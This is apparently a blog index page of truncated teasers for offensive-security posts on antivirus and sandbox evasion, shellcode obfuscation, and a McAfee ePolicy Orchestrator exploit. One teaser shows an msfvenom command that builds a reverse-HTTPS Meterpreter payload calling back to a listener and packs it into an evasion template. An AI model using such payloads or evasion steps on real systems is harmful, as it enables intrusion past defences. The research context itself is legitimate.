100% Anti-Virus evasion with Metasploit browser exploits (example with ms11-003)
1. Introduction If Metasploit encoders are great tools to avoid Anti-virus detection of the Payload (meterpreter, reverse_tcp, …), it is not always so easy to avoid the “Exploit” detection. No. This...
View ArticleSimple shellcode obfuscation
1. Introduction This article aims to provide you with the different steps needed to develop shellcode obfuscation techniques, and their respective deobfuscator assembly stubs. This should help you to...
View ArticleAntivirus Sandbox Evasion (part1) – Preview
Hmmm, it seems that I wrote something very nice .. $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o...
View ArticleAntivirus Sandbox Evasion (part2) – Slides
Hello, Here is the PowerPoint presentation explaining the sandbox evasion technique, used in the part 1 of this story (see Antivirus Sandbox Evasion (par1)). Enjoy, Note: There is a rating embedded...
View ArticleAntivirus Sandbox Evasion (part3) – The Tool
Ok, here we are.. Thank you for your patience. It is time to release the version 0.1 of the “tool“.. ;-) The archive is composed of: An EXE template (ultimate-payload-template1.exe) which manage the...
View ArticleExploit: McAfee ePolicy 0wner (ePowner) – Preview
If you heard about the following vulnerabilities in McAfee ePolicy Orchestrator version 4.6.5 and earlier: CVE-2013-0140 – Pre-authenticated SQL injection CVE-2013-0141 – Pre-authenticated directory...
View ArticleTurning your Antivirus into my botnet – OWASP Benelux 2013 – Slides
Below are the slides that I’ve presented at the OWASP Benelux day 2013 (Amsterdam). It covers partial results of my research about Managed Antivirus software, especially how I’ve chained multiple...
View Article
More Pages to Explore .....